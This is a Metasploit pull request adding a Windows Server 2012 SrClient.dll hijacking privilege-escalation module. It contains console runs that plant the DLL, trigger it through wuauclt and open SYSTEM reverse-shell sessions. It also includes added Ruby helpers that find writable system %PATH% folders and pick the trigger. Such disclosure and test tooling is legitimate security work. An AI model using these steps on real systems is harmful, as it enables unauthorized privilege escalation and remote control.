
Add Windows Server 2012 SrClient DLL Hijacking local exploit module and docs #14776


Merged
merged 3 commits into from
Mar 15, 2021

Conversation

ErikWynter
Contributor

About

This change adds a new local exploit module for a Windows Server 2012 DLL hijacking vulnerability that I recently discovered. This is a 0-day, but it won't be patched because it requires %PATH% to include directories that are writable by low-privileged users, and Microsoft won't patch %PATH% DLL Hijacking issues. That's why there is no CVE information, and there won't be.

A full write-up is available here
I also published two demo videos:

Vulnerable Application

All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way TiWorker.exe will try to call the non-existent SrClient.dll file when Windows Update checks for updates. This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users. The attack can be triggered by any low-privileged user and does not require a system reboot.

This exploit has several limitations:

  • The attack won't work when Windows Update is already checking for/downloading/installing updates on the target
  • The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)

Windows Server 2012 VM images are available at the Microsoft Evaluation Center here.

Verification Steps

  1. Start msfconsole
  2. Do: use modules/exploit/windows/local/srclient_dll_hijacking
  3. Do: set SESSION [SESSION ID]
  4. Do: run

Options

WRITABLE_PATH_DIR

The full path to a writable %PATH% directory to write the payload to. If this is not set,
the module will enumerate the %PATH% directories and try to find one that is writable by the current user.

STEALTH_ONLY

If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
WUAUCLT /DetectNow command, which will launch Windows Update in the background.
This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.

Scenarios

Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  3         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            3                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*]     Everyone
[*]     BUILTIN\Users
[*]     NT AUTHORITY\INTERACTIVE
[*]     CONSOLE LOGON
[*]     NT AUTHORITY\Authenticated Users
[*]     NT AUTHORITY\This Organization
[*]     NT AUTHORITY\Local account
[*]     LOCAL
[*]     NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*]     Checking permissions for C:\Windows\system32
[*]     Checking permissions for C:\Windows
[*]     Checking permissions for C:\Windows\System32\Wbem
[*]     Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
[*]     Checking permissions for C:\wynter
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*] 
[*]     C:\wynter
[*] 
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  8         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)

msf6 exploit(windows/local/srclient_dll_hijacking) > show options 

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION            8                yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WRITABLE_PATH_DIR  c:\wynter        no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.91.12:5555 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
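
The enumeration the WRITABLE_PATH_DIR option automates, as an added stand-alone example (this is not the module's code and does not use the Metasploit API). It reads the *system* %PATH%, the one a SYSTEM process such as TiWorker.exe resolves a missing DLL against, and reports which entries a given user's principals can write to. The registry key, the icacls output format it parses and all sample outputs are my assumptions, constructed inline so the script runs offline; on a live host the inputs would come from `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v Path`, `icacls <dir>` and `whoami /groups`.

```ruby
# Added example, not the module's code. Rights that allow creating a file in a
# directory, in icacls notation: simple rights F/M/W and the specific rights
# GA/GW (generic all/write) and WD (write data = add file).
WRITE_RIGHTS = %w[F M W GA GW WD].freeze

# Parse `reg query ... /v Path` output into a directory list, expanding
# %VAR% references from `env` and dropping a trailing backslash.
def system_path_dirs(reg_output, env)
  line = reg_output.each_line.find { |l| l =~ /^\s*Path\s+REG_(EXPAND_)?SZ\s+/i }
  return [] unless line
  raw = line.sub(/^\s*Path\s+REG_(EXPAND_)?SZ\s+/i, '').strip
  raw.split(';').map(&:strip).reject(&:empty?).map do |dir|
    expanded = dir.gsub(/%([^%]+)%/) { env.fetch(Regexp.last_match(1).upcase, Regexp.last_match(0)) }
    expanded.length > 3 ? expanded.sub(/\\\z/, '') : expanded
  end
end

# Parse `icacls <dir>` output into [principal, deny?, rights] triples. The
# first output line carries the directory itself, so strip it before matching.
def parse_icacls(dir, output)
  output.each_line.each_with_object([]) do |line, aces|
    line = line.strip
    line = line[dir.length..-1].lstrip if line.downcase.start_with?(dir.downcase)
    m = line.match(/\A(.+?):((?:\([^)]*\))+)\z/)
    next unless m
    flags = m[2].scan(/\(([^)]*)\)/).flatten.flat_map { |f| f.split(',') }
    aces << [m[1], flags.include?('DENY'), flags - ['DENY']]
  end
end

# True when one of `principal_names` (lower-cased user or group names) holds a
# write right and none of them is explicitly denied one. Deny wins, as in NTFS.
def writable_by?(dir, icacls_output, principal_names)
  aces = parse_icacls(dir, icacls_output).select { |p, _, _| principal_names.include?(p.downcase) }
  return false if aces.any? { |_, deny, rights| deny && (rights & WRITE_RIGHTS).any? }
  aces.any? { |_, deny, rights| !deny && (rights & WRITE_RIGHTS).any? }
end

# Every system %PATH% entry the principals can write to. `icacls_for` returns
# the icacls output for a directory, or nil when it is unknown (treated as
# not writable rather than guessed).
def writable_path_dirs(reg_output, env, principals, icacls_for)
  names = principals.map(&:downcase)
  system_path_dirs(reg_output, env).select do |dir|
    out = icacls_for.call(dir)
    out && writable_by?(dir, out, names)
  end
end

# Constructed sample output, modelled on the session shown in the PR.
SAMPLE_REG_PATH = <<~'REG'
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
      Path    REG_EXPAND_SZ    %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\wynter
REG
SAMPLE_ENV = { 'SYSTEMROOT' => 'C:\Windows' }.freeze
SAMPLE_PRINCIPALS = ['WIN-FCDUOQDT1NB\wynter', 'Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users'].freeze
SAMPLE_ICACLS = {
  'C:\Windows\system32' => <<~'ACL',
    C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
                        NT AUTHORITY\SYSTEM:(M)
                        BUILTIN\Administrators:(M)
                        BUILTIN\Users:(RX)
    Successfully processed 1 files; Failed processing 0 files
  ACL
  'C:\wynter' => <<~'ACL',
    C:\wynter NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
              BUILTIN\Administrators:(I)(OI)(CI)(F)
              BUILTIN\Users:(I)(OI)(CI)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)
    Successfully processed 1 files; Failed processing 0 files
  ACL
}.freeze

if __FILE__ == $PROGRAM_NAME
  lookup = ->(dir) { SAMPLE_ICACLS[dir] }
  puts "System %PATH% entries writable by #{SAMPLE_PRINCIPALS.first}:"
  writable_path_dirs(SAMPLE_REG_PATH, SAMPLE_ENV, SAMPLE_PRINCIPALS, lookup).each { |d| puts "  #{d}" }
end
```

Reading the Path value from HKLM rather than from the process environment is the point of the author's later fix: the user's own PATH is appended to the SYSTEM PATH in a normal logon session, but TiWorker.exe never sees it, so a directory that only appears there is not a usable hijack location. The same script doubles as a defensive audit: any entry it reports as writable by `BUILTIN\Users` or `Everyone` is the misconfiguration this module depends on.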

@ErikWynter
Contributor Author

ErikWynter commented Feb 19, 2021

Notes:

  • Windows Server 2008R2, 2012R2, 2016 and 2019 are not vulnerable. I don't have access to Windows Server 2003 and 2008 VMs, so it could still be tested for those systems.
  • There might still be a better / more reliable way to trigger this bug, but I haven't found it.
  • Cleanup sometimes fails to delete SrClient.dll after spawning a session. I haven't been able to figure out why because it seems random. I tested this by reverting to the same snapshot multiple times and then running the exploit. The exploit always worked, but sometimes cleanup would fail and sometimes it wouldn't.
  • The %PATH% enumeration code could be used for additional modules exploiting similar vulnerabilities, like the NetMan vulnerability for which no module exists yet.
  • I successfully and extensively tested this on two different VMs for various patch levels, including fully patched. Despite that, I still can't wait for someone to verify the exploit and assure me that I am not crazy, or at least not THAT crazy.
  • My brain hurts. Time for sleep. See you all next week.

@bwatters-r7 bwatters-r7 self-assigned this Feb 19, 2021
@ErikWynter
Contributor Author

In response to questions about reliability, to make this a safer exploit, it would also be possible to add an extra check to the module to see if TiWorker.exe is already running on the target, and not to exploit if this is the case. That should further decrease the odds of leaving a permanent backdoor (which is already not that likely if the module is used responsibly).

@ErikWynter
Contributor Author

I just realized that the module currently enumerates through all %PATH% directories, instead of just those that are part of the system PATH. I will correct this as soon as I get the chance, though that might be only next week.

@bwatters-r7
Contributor

Does the windows update have to hit the server? My 2012 server is on an isolated network, so it can't actually talk to the microsoft server, and this appears to fail:

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\Users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Failed to obtain the Windows Update setting.
[*] The module will launch the Windows Update window on the target in an attempt to trigger the payload.
[*] Writing 8704 bytes to C:\Users\msfuser\SrClient.dll...
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Exploit completed, but no session was created.

@ErikWynter
Contributor Author

@bwatters-r7 I'm not sure, but it could be, because my test machine was able to reach the update server. It may also depend on the specific wuauclt command being used. You could try it with /selfupdateunmanaged and /detectnow instead. When trying it with /detectnow, make sure Windows Update is not set to never check for updates. I also wonder why it fails to obtain the Windows update setting for you, I never had this issue. Btw, were you running Process Monitor to check if the DLL was being called? Otherwise it could be that TiWorker.exe is actually trying to load SrClient.dll but that the payload doesn't connect back for another reason.

@bwatters-r7
Contributor

bwatters-r7 commented Feb 26, 2021

OK; figured it out. I did not have a non-R2 2012 server in my range so I built one really quickly by hand. I'd forgotten that Microsoft did not turn on auto updates by default in the before times. When you install, the auto update is in a strange state- neither on nor off:
[image: screenshot of the Windows Update settings dialog]
Once I made a selection, it works well. Before you make a selection, the value in the registry is nil, so it might not be a terrible idea to include that within the case statement.

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\Users\msfuser.WIN-8AOTFCRKDQ0
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\Users\msfuser.WIN-8AOTFCRKDQ0
[*] 
[+] The target appears to be vulnerable.
[*] Writing 8704 bytes to C:\Users\msfuser.WIN-8AOTFCRKDQ0\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.134.140:49162) at 2021-02-26 10:54:44 -0600

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ErikWynter
Contributor Author

Ah that's good to know @bwatters-r7 ! I will make sure to add a check for this. Just to confirm, when auto update is in this kind of nil state, none of the wuauclt commands work to trigger SrClient.dll?

@bwatters-r7
Contributor

I am relatively sure I hardcoded both methods and attempted them. The default method (non-stealthy, I believe, because there was a pop-up for updating) breaks the updater and produces a consistent error code. It even gives the same error after a reboot when you try to start up the updater manually. I'll fire up my test machine and verify it all today.

@ErikWynter
Contributor Author

Sounds good @bwatters-r7 ! The default method is indeed non-stealthy now, due to the STEALTH_ONLY option defaulting to false. I could reverse that if you prefer, so that it only uses the non-stealthy (pop-up) attack when the user explicitly allows this and the non-stealthy command won't work.

@bwatters-r7
Contributor

I think the stealthy/nonstealthy is fine as-is. I've verified that in the default state, the registry key exists, but the value is nil. I went ahead and did a quick edit locally and added a when nil to the case statement, and it catches it in this state.
I can also verify that neither method works when the registry value is nil:

msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Failed to obtain the Windows Update setting.
[*] update value = 
[*] The module will launch the Windows Update window on the target in an attempt to trigger the payload.
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) > 
msf6 exploit(windows/local/srclient_dll_hijacking) > jobs -l
[*] 192.168.132.198 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (200262 bytes) to 192.168.132.198
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.198:49158) at 2021-03-01 17:28:34 -0600


Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4567

msf6 exploit(windows/local/srclient_dll_hijacking) > set session 2
session => 2
msf6 exploit(windows/local/srclient_dll_hijacking) > reload
[*] Reloading module...
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for C:\Windows\system32
[*] 	Checking permissions for C:\Windows
[*] 	Checking permissions for C:\Windows\System32\Wbem
[*] 	Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[!] Windows Update is not set
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) > 

…en TiWorker.exe is already running on the target
@ErikWynter
Contributor Author

ErikWynter commented Mar 6, 2021

Hi @bwatters-r7 I have incorporated all the suggested changes in the latest commit. In particular, I have made the following changes:

  • I removed the x86 target, removed the unnecessary arch checks, and added an explicit arch check for the payload, which I think should always be x64.
  • I added the nil value for the Windows Update status and moved this check to the check method.
  • I changed the method for obtaining the %PATH% variables to a reg query that returns only the SYSTEM %PATH% directories, since the current check also returned all other PATH directories if those were set, such as the user PATH.
  • I added a check to see if TiWorker.exe is running on the target. If so, the module will not proceed with exploitation because it never works (it seems at least). I added the WAIT_FOR_TIWORKER option to let users force the module to wait for TiWorker.exe to stop running and then try again.
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*] 
[*]     Everyone
[*]     BUILTIN\Users
[*]     NT AUTHORITY\INTERACTIVE
[*]     CONSOLE LOGON
[*]     NT AUTHORITY\Authenticated Users
[*]     NT AUTHORITY\This Organization
[*]     NT AUTHORITY\Local account
[*]     LOCAL
[*]     NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*]     Checking permissions for %SystemRoot%\system32
[*]     Checking permissions for %SystemRoot%
[*]     Checking permissions for %SystemRoot%\System32\Wbem
[*]     Checking permissions for %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
[*]     Checking permissions for C:\wynter
[*] 
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*] 
[*]     C:\wynter
[*] 
[+] The target appears to be vulnerable.
[!] TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to 30 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 29 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 28 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 27 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 26 minute(s)...
[*] TiWorker.exe is still running on the target. The module will keep checking for 25 minute(s)...

Note about WAIT_FOR_TIWORKER: So far I haven't actually been able to re-exploit it in this manner because TiWorker.exe seems to be running for a reeeeally long period on my test system, but I'll try this a few more times and then let you know. I was able to manually re-exploit the same system multiple times by killing TiWorker.exe. While this didn't work every single time, my findings do indicate that setting a WAIT_FOR_TIWORKER value should make re-exploitation possible sometimes.
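
The three pre-exploitation checks discussed in this thread (the unconfigured Windows Update state, the never-check mode that forces the UI trigger, and TiWorker.exe already running with the WAIT_FOR_TIWORKER retry), as an added stand-alone example rather than the module's own code. It works on captured command output so it runs offline; the registry key used here is my assumption (the module's actual key is not shown on this page), the AUOptions meanings are Microsoft's documented values, the `tasklist /FI "IMAGENAME eq TiWorker.exe"` filter is a real command, and the sample outputs are constructed.

```ruby
# Added example, not the module's code. Assumed key for the Automatic Updates
# configuration; a fresh Server 2012 install has no AUOptions value here until
# someone picks a setting in the Windows Update dialog.
AU_KEY = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update'

# Parse `reg query "<AU_KEY>" /v AUOptions` output. Returns the DWORD as an
# Integer, or nil when the value is absent (the "neither on nor off" state).
def parse_au_options(reg_output)
  reg_output.each_line do |line|
    m = line.match(/^\s*AUOptions\s+REG_DWORD\s+0x([0-9a-f]+)/i)
    return m[1].to_i(16) if m
  end
  nil
end

# Map AUOptions (1 = never check, 2 = check only, 3 = download only,
# 4 = install automatically) to the wuauclt trigger the module would use.
# Only the never-check mode needs the visible Windows Update window, which
# STEALTH_ONLY refuses; an unset value is reported as not exploitable.
def choose_trigger(au_options, stealth_only: false)
  case au_options
  when nil
    { exploitable: false, reason: 'Windows Update has not been configured' }
  when 1
    return { exploitable: false, reason: 'never-check mode needs the Windows Update UI, refused by STEALTH_ONLY' } if stealth_only
    { exploitable: true, command: 'wuauclt /selfupdatemanaged', stealth: false }
  when 2, 3, 4
    { exploitable: true, command: 'wuauclt /detectnow', stealth: true }
  else
    { exploitable: false, reason: "unexpected AUOptions value #{au_options}" }
  end
end

# True when `tasklist /FI "IMAGENAME eq TiWorker.exe"` lists the process.
def tiworker_running?(tasklist_output)
  tasklist_output.each_line.any? { |l| l =~ /^TiWorker\.exe\s+\d+/i }
end

# WAIT_FOR_TIWORKER semantics: poll every `interval` seconds for up to
# `minutes` (0 = do not wait); true once TiWorker.exe is gone, false on
# timeout. `tasklist` and `sleeper` are injectable so the loop can be driven
# offline; the defaults shell out on a real Windows host.
def wait_for_tiworker(minutes, interval: 10, tasklist: nil, sleeper: nil)
  tasklist ||= -> { `tasklist /FI "IMAGENAME eq TiWorker.exe"` }
  sleeper ||= ->(s) { sleep s }
  max_polls = (minutes * 60) / interval
  polls = 0
  loop do
    return true unless tiworker_running?(tasklist.call)
    return false if polls >= max_polls
    sleeper.call(interval)
    polls += 1
  end
end

# Constructed sample outputs.
SAMPLE_AU_CONFIGURED = <<~'REG'
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update
      AUOptions    REG_DWORD    0x4
REG
SAMPLE_AU_NEVER = SAMPLE_AU_CONFIGURED.sub('0x4', '0x1')
SAMPLE_AU_UNSET = "ERROR: The system was unable to find the specified registry key or value.\n"
SAMPLE_TASKLIST_RUNNING = <<~'TL'

  Image Name                     PID Session Name        Session#    Mem Usage
  ========================= ======== ================ =========== ============
  TiWorker.exe                  2116 Services                   0     41,208 K
TL
SAMPLE_TASKLIST_IDLE = "INFO: No tasks are running which match the specified criteria.\n"

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_AU_CONFIGURED, SAMPLE_AU_NEVER, SAMPLE_AU_UNSET].each do |out|
    puts choose_trigger(parse_au_options(out)).inspect
  end
  puts "TiWorker running: #{tiworker_running?(SAMPLE_TASKLIST_RUNNING)}"
end
```

Keeping the nil case separate from the never-check case matters: with AUOptions = 1 the `/selfupdatemanaged` trigger still works (at the cost of a visible window), whereas with no value at all neither trigger fires and, as reported above, the stale DLL would be left behind. Putting that decision in `check` rather than `exploit` means the module refuses before writing anything to the target.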

@bwatters-r7
Contributor

@kalba-security Thanks for the updates! I'm in the middle of something else right now, but I'll pick this back up on Monday; I just wanted you to know I have not forgotten about this!

@ErikWynter
Contributor Author

Sounds good, thanks for letting me know :)

@bwatters-r7
Contributor

Before Windows Update is configured:

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (200262 bytes) to 192.168.132.198
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.132.198:49158) at 2021-03-12 13:39:13 -0600

msf6 > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-8AOTFCRKDQ0\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/srclient_dll_hijacking 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/srclient_dll_hijacking) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(windows/local/srclient_dll_hijacking) > show options

Module options (exploit/windows/local/srclient_dll_hijacking):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   SESSION                             yes       The session to run this module on.
   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
   WAIT_FOR_TIWORKER  0                no        No. of minutes to wait for TiWorker.exe to finish running if it is already active.
   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2012 (x64)


msf6 exploit(windows/local/srclient_dll_hijacking) > set session 1
session => 1
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

After enabling Windows Update and rebooting...

[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 3 opened (192.168.135.197:4567 -> 192.168.134.140:49157) at 2021-03-12 14:02:18 -0600

msf6 exploit(windows/local/srclient_dll_hijacking) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-8AOTFCRKDQ0\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/srclient_dll_hijacking) > set session 3
session => 3
msf6 exploit(windows/local/srclient_dll_hijacking) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-8AOTFCRKDQ0\msfuser...
